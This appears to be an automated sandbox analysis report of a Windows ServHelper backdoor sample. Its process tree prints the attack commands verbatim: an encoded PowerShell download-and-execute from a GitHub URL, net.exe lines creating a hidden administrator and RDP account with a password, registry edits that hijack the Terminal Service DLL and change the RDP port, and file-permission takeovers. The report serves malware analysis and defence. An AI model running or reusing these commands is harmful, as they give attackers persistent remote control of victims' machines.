10Analysis
-
max time kernel: 137s
max time network: 82s
platform: windows7_x64
resource: win7v20210410
submitted: 30-07-2021 15:26
Behavioral task
behavioral1
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
ubuntu-amd64
Behavioral task
behavioral2
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsel
Behavioral task
behavioral3
Sample
0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
Resource
debian9-mipsbe
Behavioral task
behavioral4
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win7v20210408
Behavioral task
behavioral5
Sample
219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win7v20210410
Behavioral task
behavioral7
Sample
2a0f53dd66eff57c82fcad2fff75d7ac63f6f4d764ec27fe862e6b3f01a21c03.exe
Resource
win10v20210410
Behavioral task
behavioral8
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win7v20210408
Behavioral task
behavioral9
Sample
36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Resource
win10v20210410
Behavioral task
behavioral10
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win7v20210408
Behavioral task
behavioral11
Sample
4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
Resource
win10v20210410
Behavioral task
behavioral12
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win7v20210408
Behavioral task
behavioral13
Sample
42c8ded976a7c9f295888220d4d2fc273535f1fa15e6e25cfceaf454188f7895.exe
Resource
win10v20210410
Behavioral task
behavioral14
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win7v20210408
Behavioral task
behavioral15
Sample
52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf
Resource
win10v20210410
Behavioral task
behavioral16
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win7v20210410
Behavioral task
behavioral17
Sample
571de4698edff95c328d3521b11e800a3b9659ad55281dd7729b2ce2210ac931.exe
Resource
win10v20210408
Behavioral task
behavioral18
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win7v20210410
Behavioral task
behavioral19
Sample
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
Resource
win10v20210408
Behavioral task
behavioral20
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win7v20210410
Behavioral task
behavioral21
Sample
662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
Resource
win10v20210410
Behavioral task
behavioral22
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win7v20210410
Behavioral task
behavioral23
Sample
70d5a71e821c8024fa2d5fb8a389390acc1289b88745fad61b6536cab0bd5191.dll
Resource
win10v20210408
Behavioral task
behavioral24
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win7v20210408
Behavioral task
behavioral25
Sample
71d384c258d0d2cfbeeda66a1ba67085b347d934a3484e0df3fc06a684085386.exe
Resource
win10v20210410
Behavioral task
behavioral26
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win7v20210410
Behavioral task
behavioral27
Sample
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Resource
win10v20210410
Behavioral task
behavioral28
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win7v20210408
Behavioral task
behavioral29
Sample
83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
Resource
win10v20210410
Behavioral task
behavioral30
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win7v20210410
Behavioral task
behavioral31
Sample
8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
Resource
win10v20210408
Behavioral task
behavioral32
Sample
a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe
Resource
win7v20210410
General
-
Target
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow 12, pid 2564, process powershell.exe
Executes dropped EXE 4 IoCs
Processes:
pid 852 ViJoy.exe; pid 848 exe2.exe; pid 1384 exe1.exe; pid 992 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
pid 280 icacls.exe; pid 1852 icacls.exe; pid 2000 icacls.exe; pid 1528 icacls.exe; pid 1468 takeown.exe; pid 1912 icacls.exe; pid 1592 icacls.exe; pid 1652 icacls.exe
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource \Windows\Branding\mediasrv.png matches yara rule upx; resource \Windows\Branding\mediasvc.png matches yara rule upx
Deletes itself 1 IoCs
Processes:
pid 1720 powershell.exe
Loads dropped DLL 7 IoCs
Processes:
pid 852 ViJoy.exe; pid 852 ViJoy.exe; pid 852 ViJoy.exe; pid 848 exe2.exe; pid 1916; pid 1916; pid 1264
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid 1592 icacls.exe; pid 1652 icacls.exe; pid 280 icacls.exe; pid 1852 icacls.exe; pid 2000 icacls.exe; pid 1528 icacls.exe; pid 1468 takeown.exe; pid 1912 icacls.exe
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
File opened for modification: \??\PhysicalDrive0 (process exe2.exe)
Drops file in System32 directory 1 IoCs
Processes:
File created: C:\Windows\system32\rfxvmt.dll (process powershell.exe)
Drops file in Windows directory 21 IoCs
Processes:
All entries below are by process powershell.exe:
File created: C:\Windows\branding\mediasrv.png
File opened for modification: C:\Windows\branding\Basebrd
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a74ffc7-9cca-4845-bd46-8ff96c4ac43f
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c0b142a5-2b59-45fd-a99b-ce1f142c850f
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55dbdebd-e428-42e4-82e2-2ef0cdfc7458
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd10f91-0b5f-40f7-b451-e272660bae5d
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac761484-0ecd-4b05-83ec-285cc54d0e96
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_90ab2bf7-a5b2-485f-bbb1-f5e3aeea5b24
File created: C:\Windows\branding\mediasvc.png
File created: C:\Windows\branding\wupsvc.jpg
File opened for modification: C:\Windows\branding\mediasvc.png
File opened for modification: C:\Windows\branding\wupsvc.jpg
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_578ff6f3-25c8-4688-81c3-ff3e7179e5c3
File opened for modification: C:\Windows\branding\ShellBrd
File opened for modification: C:\Windows\branding\mediasrv.png
File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z2QY7QFOTGMKT0BUNU70.temp
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0bb34e5-3a6d-4514-8e04-07c75cc5c314
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abd106a9-f5f6-41e9-b78b-a62c298b662f
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c4a40091-f455-420c-bbdd-90c865751b3b
File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c695c2dd-95c9-457e-b147-d950bcde996e
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
Key created: \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main (process exe2.exe)
Modifies data under HKEY_USERS 4 IoCs
Processes:
Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (process WMIC.exe)
Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (process WMIC.exe)
Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (process powershell.exe)
Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80bafa925785d701 (process powershell.exe)
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
pid 1720 powershell.exe; pid 1720 powershell.exe; pid 2032 powershell.exe; pid 2032 powershell.exe; pid 432 powershell.exe; pid 432 powershell.exe; pid 1528 powershell.exe; pid 1528 powershell.exe; pid 1720 powershell.exe; pid 1720 powershell.exe; pid 1720 powershell.exe; pid 2564 powershell.exe; pid 2564 powershell.exe
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid 464; pid 1916; pid 1916; pid 1916; pid 1916
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
Token: SeDebugPrivilege, pid 1720 powershell.exe
Token: SeDebugPrivilege, pid 2032 powershell.exe
Token: SeDebugPrivilege, pid 432 powershell.exe
Token: SeDebugPrivilege, pid 1528 powershell.exe
Token: SeRestorePrivilege, pid 1592 icacls.exe
Token: SeAssignPrimaryTokenPrivilege, pid 2428 WMIC.exe
Token: SeIncreaseQuotaPrivilege, pid 2428 WMIC.exe
Token: SeAuditPrivilege, pid 2428 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege, pid 2428 WMIC.exe
Token: SeIncreaseQuotaPrivilege, pid 2428 WMIC.exe
Token: SeAuditPrivilege, pid 2428 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege, pid 2488 WMIC.exe
Token: SeIncreaseQuotaPrivilege, pid 2488 WMIC.exe
Token: SeAuditPrivilege, pid 2488 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege, pid 2488 WMIC.exe
Token: SeIncreaseQuotaPrivilege, pid 2488 WMIC.exe
Token: SeAuditPrivilege, pid 2488 WMIC.exe
Token: SeDebugPrivilege, pid 2564 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid 848 exe2.exe; pid 848 exe2.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exeViJoy.exeexe2.exeexe1.exepowershell.execsc.exedescription pid process target process PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 308 wrote to memory of 852 308 79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe ViJoy.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 848 852 ViJoy.exe exe2.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 852 wrote to memory of 1384 852 ViJoy.exe exe1.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 848 wrote to memory of 992 848 exe2.exe NFWCHK.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1384 wrote to memory of 1720 1384 exe1.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 1720 wrote to memory of 432 1720 powershell.exe csc.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 432 wrote to memory of 1500 432 csc.exe cvtres.exe PID 1720 wrote to memory of 2032 1720 
powershell.exe powershell.exe PID 1720 wrote to memory of 2032 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 2032 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 432 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1528 1720 powershell.exe powershell.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1468 1720 powershell.exe takeown.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1912 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1592 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1652 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 280 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1852 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 2000 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to 
memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 1528 1720 powershell.exe icacls.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe PID 1720 wrote to memory of 964 1720 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
-
C:\Windows\system32\net.exenet start rdpdr7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
-
C:\Windows\system32\net.exenet start TermService7⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bu4XEaZT /add1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bu4XEaZT /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc bu4XEaZT1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc bu4XEaZT2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00676e6f-05a9-4da9-aa0e-696a0ccc9272
MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22330762-ff7d-40b8-a48f-aa5932dc17c9
MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
